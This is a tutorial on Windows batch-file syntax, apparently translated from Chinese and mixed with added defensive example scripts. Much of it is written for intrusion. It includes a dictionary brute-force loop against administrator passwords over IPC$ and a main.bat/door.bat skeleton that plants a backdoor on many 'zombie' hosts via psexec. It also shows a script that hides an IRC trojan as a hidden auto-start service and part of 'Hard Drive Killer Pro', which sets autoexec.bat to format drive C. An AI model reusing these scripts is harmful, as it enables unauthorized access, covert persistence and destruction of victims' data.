Simple .bat syntax

I. A brief introduction to the basic batch internal commands

1. The Echo command

Turns command echoing on or off, or displays a message. With no parameters, echo displays the current echo setting.

Syntax

echo [{on|off}] [message]

Sample: @echo off / echo hello world

In practice we combine this command with the redirection symbols (also called pipe symbols, usually > >> ^) to write commands into a file of a particular format. Later examples will show this.

2. The @ command

Suppresses display of the command that follows the @. During an intrusion (for example, using a batch file to format the enemy's hard disk) you naturally cannot let the other side see the commands you are running.

Sample:
@echo off
@echo Now initializing the program,please wait a minite...
@format X: /q/u/autoset

(The format command cannot be given the /y parameter; happily Microsoft left us the autoset parameter, which has the same effect as /y.)

3. The Goto command

Jumps to a label; once the label is found, execution continues with the command on the line after it.

Syntax: goto label (label is the parameter that names the line in the batch program to jump to.)

Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end

(If you do not understand if, %1 and %2 here, skip over them for now; they are explained in detail below.)

The label name can be anything, but it is best to use meaningful letters. A colon before the letters marks them as a label, and goto looks for that colon to find where to jump next. Add some explanation so that others can understand your intent.

4. The Rem command

A comment command, equivalent to /*--------*/ in C. It is not executed and serves only as a comment, making the file easier for others to read and for you to modify later.

Rem Message

Sample: @Rem Here is the description.

5. The Pause command

When Pause runs, the following message is displayed:

Press any key to continue . . .

Sample:
@echo off
:begin
copy a:*.* d:\back
echo Please put a new disk into driver A
pause
goto begin

In this example, all files on the disk in drive A are copied to d:\back. When the displayed prompt asks you to put another disk into drive A, the pause command suspends the program so that you can change disks, and pressing any key then continues processing.

6. The Call command

Calls one batch program from another without terminating the parent batch program. call accepts a label as the call target. If Call is used outside a script or batch file, it has no effect at the command line.

Syntax

call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]

Parameters

[Drive:][Path] FileName

Specifies the location and name of the batch program to call. The filename parameter must have a .bat or .cmd extension.

7. The start command

Calls an external program; all DOS commands and command-line programs can be invoked through start.

Parameters commonly used in intrusions:

MIN        Start the window minimized
SEPARATE   Start a 16-bit Windows program in a separate memory space
HIGH       Start the application in the HIGH priority class
REALTIME   Start the application in the REALTIME priority class
WAIT       Start the application and wait for it to terminate
parameters The parameters passed to the command/program

When the application being started is a 32-bit GUI application, CMD.EXE returns to the command prompt without waiting for the application to terminate. This new behaviour does not occur when executed from within a command script.

8. The choice command

choice lets the user type a character, and a different command runs depending on which one. Use it with the /c: parameter, followed (with no space) by the characters that may be entered. Its return code is 1, 2, 3, 4 ... in the order the characters are listed.

For example: choice /c:dme defrag,mem,end

displays

defrag,mem,end[D,M,E]?

Sample:

Sample.bat contains:

@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto end
if errorlevel 2 goto mem
if errorlevel 1 goto defrag
:defrag
c:\dos\defrag
goto end
:mem
mem
goto end
:end
echo good bye

(Test the highest error code first: "if errorlevel n" is true for any return code greater than or equal to n, so d = 1, m = 2 and e = 3 must be checked in descending order.)

When this file runs it displays defrag,mem,end[D,M,E]?. The user may choose d, m or e, and the if statements decide: d runs the section labelled defrag, m runs the section labelled mem, e runs the section labelled end. Each section ends with goto end, which jumps to the end label; the program then displays good bye and the file finishes.

9. The If command

if tests whether a specified condition holds and so decides which commands run. There are three forms:

1) if "parameter" == "string" command

If the parameter equals the given string, the condition holds and the command runs; otherwise execution continues with the next line. (Note the two equals signs.)

For example:
if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2) if exist filename command

If the specified file exists, the condition holds and the command runs; otherwise execution continues with the next line.

For example: if exist config.sys edit config.sys

3) if errorlevel / if not errorlevel number command

If the return code is the specified number (strictly, that number or higher), the condition holds and the command runs; otherwise execution continues with the next line.

For example: if errorlevel 2 goto x2

Every DOS program returns a number to DOS when it finishes, called the error code (errorlevel) or return code; the common return codes are 0 and 1.
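The three if forms and choice's return codes together, as an added example that is not part of the original article: a small defender-side menu that logs the machine's shares and listening TCP ports. It uses the modern choice syntax (/C letters, /M prompt) rather than the /c: form shown above; the script name audit.bat and the log file names are assumptions.

```batch
@echo off
rem Added example (not from the original article): a small defender-side
rem menu using the three if forms and choice's return codes.
rem Usage: audit.bat <logdir>     e.g. audit.bat C:\auditlogs
rem (audit.bat and the log directory are assumptions of this example)

rem if form 1: string comparison; %~1 strips any quotes so an empty or a
rem quoted argument both compare safely.
if "%~1"=="" goto usage
set "LOG=%~1"

rem if form 2: existence test; create the log directory if it is missing.
if not exist "%LOG%\" md "%LOG%"

:menu
echo.
echo [S] log shares   [L] log listening TCP ports   [Q] quit
rem choice returns 1 for S, 2 for L, 3 for Q (modern syntax: /C letters /M prompt).
choice /C SLQ /M "Select"

rem if form 3: "if errorlevel n" is true for every code >= n, so the
rem highest code is tested first; tested in ascending order, every key
rem would satisfy the first test.
if errorlevel 3 goto end
if errorlevel 2 goto ports
if errorlevel 1 goto shares

:shares
echo --- shares at %date% %time% --- >>"%LOG%\shares.log"
net share >>"%LOG%\shares.log"
type "%LOG%\shares.log"
goto menu

:ports
echo --- listeners at %date% %time% --- >>"%LOG%\ports.log"
netstat -an -p tcp | find "LISTENING" >>"%LOG%\ports.log"
type "%LOG%\ports.log"
goto menu

:usage
echo Usage: %~nx0 logdir
exit /b 1

:end
echo Logs are in %LOG%
exit /b 0
```

Each log is appended with >> so repeated runs build a history that can be compared later; the descending errorlevel tests are the part most often got wrong when a menu like this is written by hand.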
10. The for command

for is a relatively complex command, mainly used to run a command repeatedly with a parameter over a specified set.

When using FOR in a batch file, specify the variable as %%variable.

for {%variable|%%variable} in (set) do command [CommandLineOptions]

%variable          Specifies a single-letter replaceable parameter.
(set)              Specifies a set of one or more files. Wildcards may be used.
command            Specifies the command to carry out for each file.
command-parameters Specifies parameters or switches for the specified command.

When using FOR in a batch file, specify the variable as %%variable rather than %variable. Variable names are case sensitive, so %i is different from %I.

If command extensions are enabled, the following additional forms of the FOR command are supported:

FOR /D %variable IN (set) DO command [command-parameters]

If set contains wildcards, it matches directory names instead of file names.

FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]

Walks the directory tree rooted at [drive:]path, executing the FOR statement in each directory of the tree. If no directory is specified after /R, the current directory is used. If set is just a single period (.) character, it enumerates the directory tree.

FOR /L %variable IN (start,step,end) DO command [command-parameters]

The set is a sequence of numbers from start to end, by step. So (1,1,5) generates the sequence 1 2 3 4 5 and (5,-1,1) generates the sequence 5 4 3 2 1.

FOR /F ["options"] %variable IN (file-set) DO command [command-parameters]
FOR /F ["options"] %variable IN ("string") DO command [command-parameters]
FOR /F ["options"] %variable IN ('command') DO command [command-parameters]

or, if the usebackq option is present:

FOR /F ["options"] %variable IN ("file-set") DO command [command-parameters]
FOR /F ["options"] %variable IN ('string') DO command [command-parameters]
FOR /F ["options"] %variable IN (`command`) DO command [command-parameters]

file-set is one or more file names. Each file is opened, read and processed before going on to the next file in file-set. Processing consists of reading the file, breaking it into individual lines of text, and then parsing each line into zero or more tokens. The body of the For loop is then called with the variable value(s) set to the token string(s) found. By default, /F passes the first blank-separated token from each line of each file. Blank lines are skipped. You can override the default parsing behaviour by specifying the optional "options" parameter. This is a quoted string containing one or more keywords that specify different parsing options. The keywords are:

eol=c          - specifies an end-of-line comment character (just one)
skip=n         - specifies the number of lines to skip at the beginning of the file
delims=xxx     - specifies a delimiter set. This replaces the default delimiter set of space and tab.
tokens=x,y,m-n - specifies which tokens from each line are to be passed to the for body for each iteration. This causes additional variable names to be allocated. The m-n form is a range, specifying the mth through the nth tokens. If the last character in the tokens= string is an asterisk, an additional variable is allocated and receives the remaining text on the line after the last token parsed.
usebackq       - specifies that the new semantics are in force: a back-quoted string is executed as a command, a single-quoted string is a literal string, and double quotes may be used to quote file names in file-set.
sample1:

FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

parses each line in myfile.txt, ignoring lines that begin with a semicolon, and passes the second and third tokens of each line to the for body, with tokens delimited by commas and/or spaces. Note that the for body statements reference %i to get the second token, %j to get the third token, and %k to get all the remaining tokens after the third. For file names that contain spaces you need to quote the file name with double quotes; to use double quotes that way you also need the usebackq option, otherwise the double quotes are interpreted as defining a literal string to parse.

%i is explicitly declared in the for statement, while %j and %k are implicitly declared via the tokens= option. You can specify up to 26 tokens via the tokens= line, provided it does not cause an attempt to declare a variable higher than the letter z or Z. Remember that FOR variables are single-letter, case sensitive and global, and no more than 52 can be in use at any one time.

You can also use the FOR /F parsing logic on an immediate string by enclosing the file-set between the parentheses in quotes. It is then treated as a single line of input from a file.

Finally, you can use FOR /F to parse the output of a command. Do this by making the file-set between the parentheses a back-quoted string. The string is treated as a command line, passed to a child CMD.EXE, and its output is captured into memory and parsed as if it were a file. So the following example:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

enumerates the environment variable names in the current environment.

In addition, substitution of FOR variable references has been enhanced. You can now use the following option syntax:

%~I         - expands %I removing any surrounding quotes (")
%~fI        - expands %I to a fully qualified path name
%~dI        - expands %I to a drive letter only
%~pI        - expands %I to a path only
%~nI        - expands %I to a file name only
%~xI        - expands %I to a file extension only
%~sI        - expanded path contains short names only
%~aI        - expands %I to the file attributes of the file
%~tI        - expands %I to the date/time of the file
%~zI        - expands %I to the size of the file
%~$PATH:I   - searches the directories listed in the PATH environment variable and expands %I to the first fully qualified name found. If the environment variable is not defined or the file is not found, this modifier expands to the empty string.

The modifiers can be combined to get compound results:

%~dpI       - expands %I to a drive letter and path only
%~nxI       - expands %I to a file name and extension only
%~fsI       - expands %I to a full path name with short names only
%~dp$PATH:I - searches the directories listed in the PATH environment variable for %I and expands to the drive letter and path of the first one found
%~ftzaI     - expands %I to a DIR-like output line

In the examples above, %I and PATH can be replaced by other valid values. The %~ syntax is terminated by a valid FOR variable name. Picking upper-case variable names like %I makes it more readable and avoids confusion with the modifiers, which are not case sensitive.
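An added example (not from the original article or from Microsoft's help) that exercises the FOR /F options and the %~ modifiers from the two passages above on a constructed input file, so that it can be run anywhere. The file name forf_sample.txt, the records in it and the :show subroutine are assumptions; the PATH lookup at the end is a defender's check of which copy of a program actually runs when its bare name is typed.

```batch
@echo off
setlocal
rem Added example (not from the original article): exercises the FOR /F
rem options and the %%~ modifiers on constructed input, so it runs anywhere.

rem --- 1. Constructed sample file: a header line, ";" comment lines and
rem        records separated by commas and/or spaces (host, user, notes).
set "IN=%TEMP%\forf_sample.txt"
> "%IN%" echo host,user,notes
>>"%IN%" echo ; constructed sample data, not a real log
>>"%IN%" echo 10.0.0.5,alice,first login, from vpn
>>"%IN%" echo ; another comment
>>"%IN%" echo 10.0.0.9,bob,console

rem skip=1 drops the header line (skip is applied before eol),
rem eol=; drops the comment lines, delims=, and space split the fields,
rem tokens=1,2* gives %%a=host %%b=user %%c=the rest of the line verbatim.
rem usebackq lets the file name be double-quoted (needed if %%TEMP%% has spaces).
for /f "usebackq eol=; skip=1 tokens=1,2* delims=, " %%a in ("%IN%") do (
    echo host=%%a user=%%b rest=[%%c]
)
del "%IN%"

rem --- 2. Parsing command output (the help's own `set` example), narrowed
rem        to variables whose names start with PATH: PATH and PATHEXT.
for /f "usebackq delims==" %%v in (`set PATH`) do echo variable: %%v

rem --- 3. %%~ modifiers. %%~$PATH:I answers a defender's question: which
rem        copy of a program actually runs when its bare name is typed?
for %%I in (cmd.exe net.exe notepad.exe) do (
    echo %%I resolves on PATH to: "%%~$PATH:I"
)
rem Split the resolved cmd.exe into its parts; the same modifiers work on
rem batch parameters (%%~f1 and so on), which is what :show uses.
for %%I in (cmd.exe) do call :show "%%~$PATH:I"
goto :eof

:show
echo full : %~f1
echo drive: %~d1   path: %~p1
echo name : %~n1   ext : %~x1
echo size : %~z1   time: %~t1   attrs: %~a1
goto :eof
```

The first loop prints two records (alice and bob) with the comment lines and the header gone, and the third token keeps its internal comma and spaces because the trailing * collects the remainder of the line verbatim.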

The text above is Microsoft's official help for FOR. Below are a few examples that show concretely how the For command is used in intrusions.

sample2:

Using the For command to brute-force the password of a target Win2k host.

We use net use \\ip\ipc$ "password" /u:"administrator" to attempt a connection to the target host, and note the password when it succeeds.

The key command is a single line: for /f %i in (dict.txt) do net use \\ip\ipc$ "%i" /u:"administrator"

%i stands for the admin password; each value of %i taken from dict.txt is tried with the net use command. The result is then passed to the find command:

for /f %%i in (dict.txt) do net use \\ip\ipc$ "%%i" /u:"administrator" | find ":命令成功完成">>D:\ok.txt

and that is that.

sample3:

Have you ever had a pile of zombies waiting for you to plant backdoors and trojans on? When there are a great many of them, something that should be fun becomes tedious :). The beginning of the article mentioned that batch files can simplify routine or repetitive tasks. How? Read on and you will see.

Again there is really only one key command: (when using FOR in a batch file, write the variable as %%variable)

@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k

For the use of tokens see sample1 above; here it passes the contents of victim.txt, in order, to door.bat's parameters %i %j %k.

cultivate.bat simply uses net use to establish the IPC$ connection, copies the trojan and backdoor to the victim, then uses the return code (If errorlevel) to filter the hosts where the backdoor was planted successfully, and echoes them to the screen or to a specified file.

delims= (with a space after it) means the contents of victim.txt are separated by spaces. By now you can surely see what victim.txt looks like: it is arranged according to what %%i %%j %%k stand for, generally ip password username.

Code skeleton:

--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------

------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------

This is only a skeleton of an automatic backdoor-planting batch. The two batch files, the backdoor program (Windrv32.exe) and PSexec.exe must be placed in the same directory. The batch contents can be extended further, for example adding log-clearing and DDOS functions, adding scheduled creation of users, or, going deeper, giving it self-propagation (a worm). No more is said about that here; interested friends can research it themselves.
II. How to use parameters in a batch file

A batch file can use parameters, normally the nine from %1 to %9. When there are more parameters you need shift to move through them; that situation is uncommon, so we will not consider it here.

sample1: fomat.bat

@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/autoset
@echo please insert another disk to driver A.
@pause
@goto format

This example formats several floppy disks in succession, so to use it you type fomat.bat a in the DOS window. Heh, that seems a little redundant ~^_^

sample2:

Whenever we want to establish an IPC$ connection we have to type a long string of commands and easily mistype them, so we might as well put the fixed commands into a batch file and pass the zombie's ip, password and username to it as parameters; then we do not have to type the commands every time.

@echo off
@net use \\%1\ipc$ "%2" /u:"%3"
@if errorlevel 1 echo connection failed

(Note that PASSWORD is the second parameter here.)

See, using parameters is fairly simple, isn't it? Someone as sharp as you has surely got it ^_^.

III. How to use compound commands

1. &

Usage: first command & second command [& third command...]

This runs several commands in sequence regardless of whether each command succeeds.

Sample:

C:\>dir z: & dir c:\Ex4rch
The system cannot find the path specified.
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB

 Directory of c:\Ex4rch

2002-05-14  23:51       <DIR>          .
2002-05-14  23:51       <DIR>          ..
2002-05-14  23:51                   14 sometips.gif

3. ||

Usage: first command || second command [|| third command...]

This also runs several commands, but as soon as one command succeeds the commands after it are not run; if none succeeds, all of them are run.

Sample:

C:\Ex4rch>dir sometips.gif || del sometips.gif
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB

 Directory of C:\Ex4rch

2002-05-14  23:55                   14 sometips.gif
               1 File(s)             14 bytes
               0 Dir(s)     768,696,320 bytes free

An example of using compound commands:

sample:

@copy trojan.exe \\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt
IV. Using pipe commands

1. The | command

Usage: first command | second command [| third command...]

Uses the output of the first command as the input of the second command; this is a very common idiom in unix.

sample:

time /t>>D:\IP.log
netstat -n -p tcp | find ":3389">>D:\IP.log
start Explorer

See it? Terminal Services lets us define a custom start program for a user; having the user run this bat on login records the IP of the user logging in.

2. The > and >> output redirection commands

Redirect the output of a command or program into a particular file. The difference between > and >> is that > clears the existing contents of the file before writing, while >> only appends to the file without altering what is already in it.

sample1:

echo hello world>c:\hello.txt (stupid example?)

sample2:

DLL trojans are all the rage these days, and we know system32 is a great place to play hide and seek: many trojans burrow into it, and DLL trojans are no exception. With that in mind, after installing the system and the necessary applications we can record the EXE and DLL files in that directory:

Run CMD, change directory to system32, then: dir *.exe>exeback.txt & dir *.dll>dllback.txt

All the EXE and DLL file names are now recorded in exeback.txt and dllback.txt respectively.

Later, if something seems wrong but the traditional methods find no problem, consider whether a DLL trojan has slipped into the system. Record the EXE and DLL files under system32 again with the same command, this time into exeback1.txt and dllback1.txt, then run:

CMD: fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>>diff.txt

(FC compares the earlier and later listings of the DLL and EXE files and writes the result to diff.txt; the second fc must use >> or it would overwrite the first result.) This reveals the extra DLL and EXE files, and by checking their creation time, version, whether they are packed and so on, it is fairly easy to judge whether a DLL trojan has paid a visit. Best if there is none; if there is, do not simply DEL it: first unregister the backdoor DLL with regsvr32 /u trojan.dll, then move it to the recycle bin, and if the system shows no abnormal reaction, delete it for good or submit it to an antivirus company.
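The baseline-and-compare technique above as a complete, re-runnable script, added here as an example; it is not the article's own code. It records size and last-write time as well as names, so a file replaced under the same name also shows up, and it uses > for the first write and >> for appends as section 2 describes. The storage directory %SystemRoot%\sysbase and the file names are assumptions.

```batch
@echo off
setlocal
rem Added example (not from the original article): the system32 baseline
rem and compare technique above as a re-runnable script. It records size
rem and last-write time as well as names, so a file replaced under the same
rem name is also detected.
rem Usage:  sysbase.bat baseline   (once, on a known-clean system)
rem         sysbase.bat compare    (later)
rem %%SystemRoot%%\sysbase and the file names are assumptions.

set "TARGET=%SystemRoot%\system32"
set "STORE=%SystemRoot%\sysbase"
if not exist "%STORE%\" md "%STORE%"

if /i "%~1"=="baseline" goto baseline
if /i "%~1"=="compare"  goto compare
echo Usage: %~nx0 baseline ^| compare
exit /b 1

:snapshot
rem %%1 = output file. /a-d lists files only, /t:w shows last-write time,
rem /-c drops thousands separators, /on gives a stable name order for fc;
rem findstr keeps only the .exe and .dll lines (drops headers and totals).
dir /a-d /t:w /-c /on "%TARGET%\*.exe" "%TARGET%\*.dll" ^
    | findstr /i /r /c:"\.exe$" /c:"\.dll$" > "%~1"
goto :eof

:baseline
call :snapshot "%STORE%\baseline.txt"
echo Baseline written to %STORE%\baseline.txt
exit /b 0

:compare
if not exist "%STORE%\baseline.txt" (
    echo No baseline yet; run "%~nx0 baseline" on a known-clean system first.
    exit /b 2
)
call :snapshot "%STORE%\current.txt"
rem fc returns 0 when the files match and 1 when they differ. The report
rem is written with > (fresh each run) and appended to history.log with >>.
fc "%STORE%\baseline.txt" "%STORE%\current.txt" > "%STORE%\diff.txt"
if errorlevel 1 (
    echo Differences found; see %STORE%\diff.txt
    echo --- %date% %time% --- >>"%STORE%\history.log"
    type "%STORE%\diff.txt" >>"%STORE%\history.log"
    exit /b 1
)
echo No change in %TARGET% since baseline.
exit /b 0
```

The baseline must be taken on a system you trust, and on a live system legitimate updates will also change the listing, so each difference still has to be checked by version, signature and timestamp as the text above suggests.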
3. <, >& and <&

<   Reads command input from a file instead of from the keyboard.

>&  Writes the output of one handle to the input of another handle.

<&  Reads input from one handle and writes it to the output of another handle.

These are not used often, so no more is said about them.

V. How to operate on the registry from a batch file

During an intrusion we often need to operate on particular registry keys and values to achieve some end, for example deleting leftover values under Run to hide a backdoor or trojan, or creating a service to load a backdoor. Of course we also modify the registry to harden a system or change some property of it. All of this requires some understanding of registry operations, so let us first learn how to use .REG files to operate on the registry (a batch file can generate a REG file for us).

The common registry operations are create, modify and delete.

1. Create

There are two kinds of creation. The first creates a subkey.

We create a file with the following content:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

Run that script and you have created a subkey named "hacker" under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.

The second kind creates a value (entry) name.

That file format is the typical one, identical to what you get when exporting from the registry:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:00000002

This creates three entries under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, Door and Autodos.

Invader has the type "String Value"
Door has the type "REG SZ Value"
Autodos has the type "DWORD Value"

2. Modify

Modifying is comparatively simple: export the entries you need to modify, edit them in Notepad, then import the file (regedit /s).

3. Delete

First, deleting a value name. We create the following file:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-

Run the script, and "Ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted.

Now deleting a subkey. We create the following script:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

Run the script, and [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] itself is deleted.

By now you should basically have .reg files under control. The goal now is to create a .reg file with particular content from a batch file; remember that, as we said earlier, the redirection symbols make it easy to create a file of a particular type.

sample1: as in the example above, to generate the following registry file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:00000002

you only need:

@echo Windows Registry Editor Version 5.00>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"="C:\\WINNT\\system32\\door.exe">>Sample.reg
@echo "Autodos"=dword:00000002>>Sample.reg

(The first line uses > to create Sample.reg afresh; every line after it uses >> to append, otherwise each echo would overwrite the previous one.)
sample2:

When using some of the older trojans today, they may create a value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (RunOnce, RunServices, RunExec)] to start themselves automatically. But that exposes the trojan's path easily and gets it found and killed; registering the trojan as a system service is relatively safer. Below, a configured IRC trojan, DSNX (named windrv32.exe), is used as the example:

@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@del patch.dll
@REM [Delete DSNXDE's startup entry from the registry; use sc.exe to register it as a critical system service while setting its attributes to hidden and read-only, and configure it to start automatically]
@REM Safer this way ^_^.
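The defender's side of this section, as an added example that is not part of the original article: listing the Run/RunOnce autostart values, and removing one by name with a generated .reg file that uses the "name"=- syntax shown above, after backing the key up and with a reg query check afterwards. The script name runfix.bat, the backup folder and the value names are assumptions.

```batch
@echo off
setlocal
rem Added example (not from the original article): list the Run/RunOnce
rem autostart values, or remove one by name with a generated .reg file that
rem uses the "name"=- syntax above, after backing the key up and with a
rem reg query check afterwards.
rem Usage:  runfix.bat list
rem         runfix.bat remove HKLM ValueName     (or HKCU)
rem runfix.bat, the backup folder and the value names are assumptions.

set "SUBKEY=SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
set "STORE=%SystemRoot%\runfix"
if not exist "%STORE%\" md "%STORE%"

if /i "%~1"=="list"   goto list
if /i "%~1"=="remove" goto remove
echo Usage: %~nx0 list  ^|  %~nx0 remove HKLM^|HKCU ValueName
exit /b 1

:list
for %%H in (HKLM HKCU) do for %%K in (Run RunOnce) do (
    echo [%%H\SOFTWARE\Microsoft\Windows\CurrentVersion\%%K]
    rem reg query prints "    Name    REG_SZ    Data". The key-name line has
    rem a single token, so only lines with a second token are value lines.
    rem A value name containing spaces would be split; tokens=* keeps the rest.
    for /f "tokens=1,2,*" %%a in ('reg query %%H\SOFTWARE\Microsoft\Windows\CurrentVersion\%%K 2^>nul') do (
        if not "%%b"=="" echo    %%a  [%%b]  %%c
    )
)
exit /b 0

:remove
if "%~3"=="" (
    echo remove needs a hive ^(HKLM or HKCU^) and a value name.
    exit /b 1
)
rem .reg files need the full hive name, reg.exe accepts either form.
set "HIVE="
if /i "%~2"=="HKLM" set "HIVE=HKEY_LOCAL_MACHINE"
if /i "%~2"=="HKCU" set "HIVE=HKEY_CURRENT_USER"
if not defined HIVE (
    echo hive must be HKLM or HKCU
    exit /b 1
)
set "KEY=%HIVE%\%SUBKEY%"
set "NAME=%~3"

rem 1. Confirm the value exists: reg query sets errorlevel 1 when it does not.
reg query "%KEY%" /v "%NAME%" >nul 2>&1
if errorlevel 1 (
    echo Value "%NAME%" not found under %KEY%
    exit /b 2
)
reg query "%KEY%" /v "%NAME%"

rem 2. Back up the whole key; "regedit /s backup.reg" restores it.
set "BACKUP=%STORE%\%~2_Run_backup.reg"
reg export "%KEY%" "%BACKUP%" /y >nul

rem 3. Generate the .reg: > creates it with the header, >> appends the rest.
rem    "name"=- deletes that value when the file is imported.
set "REGFILE=%STORE%\remove.reg"
> "%REGFILE%" echo Windows Registry Editor Version 5.00
>>"%REGFILE%" echo.
>>"%REGFILE%" echo [%KEY%]
>>"%REGFILE%" echo "%NAME%"=-
regedit /s "%REGFILE%"

rem 4. Verify: the same query must now fail.
reg query "%KEY%" /v "%NAME%" >nul 2>&1
if not errorlevel 1 (
    echo Removal FAILED; "%NAME%" is still present. Restore with: regedit /s "%BACKUP%"
    exit /b 3
)
echo Removed "%NAME%" from %KEY%. Backup: %BACKUP%
exit /b 0
```

Removing the autostart value only stops the program from being launched again; the file it pointed to, and any service registered for it with sc.exe as in the sample above, still have to be dealt with separately.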
VI. A selection of fine examples.

1. A batch file to delete the default shares of win2k/xp

------------------------ cut here then save as .bat or .cmd file ---------------------------

@echo preparing to delete all the default shares.when ready pres any key.

@pause

@echo off

:Rem check parameters if null show usage.

if {%1}=={} goto :Usage

:Rem code start.

echo.

echo ------------------------------------------------------

echo.

echo Now deleting all the default shares.

echo.

net share %1$ /delete

net share %2$ /delete

net share %3$ /delete

net share %4$ /delete

net share %5$ /delete

net share %6$ /delete

net share %7$ /delete

net share %8$ /delete

net share %9$ /delete

net stop Server

net start Server

echo.

echo All the shares have been deleteed

echo.

echo ------------------------------------------------------

echo.

echo Now modify the registry to change the system default properties.

echo.

echo Now creating the registry file

echo Windows Registry Editor Version 5.00> c:\delshare.reg

echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg

echo "AutoShareWks"=dword:00000000>> c:\delshare.reg

echo "AutoShareServer"=dword:00000000>> c:\delshare.reg

echo Nowing using the registry file to chang the system default properties.

regedit /s c:\delshare.reg

echo Deleting the temprotarily files.

del c:\delshare.reg

goto :END
:Usage

echo.

echo ------------------------------------------------------

echo.

echo ☆ A example for batch file ☆

echo ☆ [Use batch file to change the sysytem share properties.] ☆

echo.

echo Author:Ex4rch

echo Mail:Ex4rch@hotmail.com QQ:1672602

echo.

echo Error:Not enough parameters

echo.

echo ☆ Please enter the share disk you wanna delete ☆

echo.

echo For instance,to delete the default shares:

echo delshare c d e ipc admin print

echo.

echo If the disklable is not as C: D: E: ,Please chang it youself.

echo.

echo example:

echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :

echo delshare c d e x y z ipc admin print

echo.

echo *** you can delete nine shares once in a useing ***

echo.

echo ------------------------------------------------------

goto :EOF

:END

echo.

echo ------------------------------------------------------

echo.

echo OK,delshare.bat has deleted all the share you assigned.

echo.Any questions ,feel free to mail to Ex4rch@hotmail.com.

echo

echo.

echo ------------------------------------------------------

echo.

:EOF

echo end of the batch file

------------------------ cut here then save as .bat or .cmd file ---------------------------

3. Hard Drive Killer Pro Version 4.0 (getting batch programming to this level is really not easy.)

------------------------ cut here then save as .bat or .cmd file ---------------------------

@echo off

rem This program is dedecated to a very special person that does not want to be named.

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo call format c: /q /u /autoSample >nul >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat >nul

rem Drive checking and assigning the valid drives to the drive variable.

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.

rem drivechk.bat is the file name under the root directory.

rem As far as the drive detection and drive variable settings, dont worry about how it

rem works, its d*amn to complicated for the average or even the expert batch programmer.

rem Except for Tom Lavedas.

echo @echo off >drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS . . .

rem When errorlevel is 1, then the above is not true, if 0, then its true.

rem Opposite of binary rules. If 0, it will elaps to the next command.

echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

